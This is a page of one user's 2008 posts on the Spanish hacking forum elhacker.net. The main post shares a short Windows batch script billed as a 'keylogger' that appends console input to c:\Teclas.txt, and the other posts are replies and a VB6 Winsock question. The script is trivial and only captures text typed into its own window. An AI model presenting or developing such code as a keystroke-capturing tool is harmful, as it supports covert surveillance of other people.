elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Sigue las noticias más importantes de seguridad informática en el Twitter! de elhacker.NET


  Mostrar Mensajes
Páginas: 1 [2]
11  Programación / Scripting / Re: Keylogger en batch.. en: 18 Diciembre 2008, 22:17 pm
Tiene razón...

Me equivoqué, perdón xd xd..

saludos..
..
22222
12  Programación / Scripting / Re: Keylogger en batch.. en: 18 Diciembre 2008, 18:28 pm
ya xd xd pero recuerda qué está hecho en batch...

13  Programación / Scripting / Keylogger en batch.. en: 18 Diciembre 2008, 17:49 pm
hola, ¿qué tal?....

Muchos decían, qué no se puede crear un Keylogger en batch...

Pues aquí os dejo uno qué tenía por ahí que no chutaba, pero hoy lo he mirao y lo he arregalo,  y aora va muy bien.....

Funcionamiento: abrir el keylogger, y empiezan ha escribir.
Se creará un texto, llamado :  Teclas.txt en c:\      .( eso luego lo podeis cambiar vosotros y añadir más cosas....)

Pegas: Lo malo qué tiene este keylogger esqué hay que habrirlo como admin, y tambien es qué depues de escribir hay que darle al enter para que se guarde en el texto...
(yo lo prové en W. Vista, no sé si lo de habrirlo como admin en XP hará falta o no.. pruebenlo..)....

Bueno pero algo es algo.. ..::
Pues aqui les dejo el codigo fuente para qué lo disfruten bien. jeje,, ..
..

Código:

@echo off
cls
echo    !virusin!
:1
echo .>>c:\Teclas.txt
echo -------------------
set /p puls=
echo %puls%>>c:\Teclas.txt
goto:1


Disfrutarlo..

Saludos..22
14  Programación / Programación Visual Basic / Re: problema al abrir *.frm / *vbp en vb6 en: 18 Diciembre 2008, 16:28 pm
Mm... pero ese no es mi error..

Sigo sín poder solucionarlo...   :-( :huh:
15  Programación / Programación Visual Basic / problema al abrir *.frm / *vbp en vb6 en: 18 Diciembre 2008, 12:06 pm
Hola, qué tal?

Pues tengo un problema con el VB6, el problema es cuando utilizo winsocks en algún programa...

Cúando ejecuto el programa qué estoy creadno en vb6 en modo purbea osea para ver como quedará no me tira ningún error, pero si guardo el proyecto y lo intento abrir me sale un error.

Aquí os dejo lo que pone en el log.

Línea 18: la clase MSWinsockLib.Winsock del control Winsock1 no era una clase de control cargada.

Y no sé a que s edebe ese error.¿Cómo puedo solucionarlo?

Muchas gracias por adelantado.

Y saludos.
.
Páginas: 1 [2]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines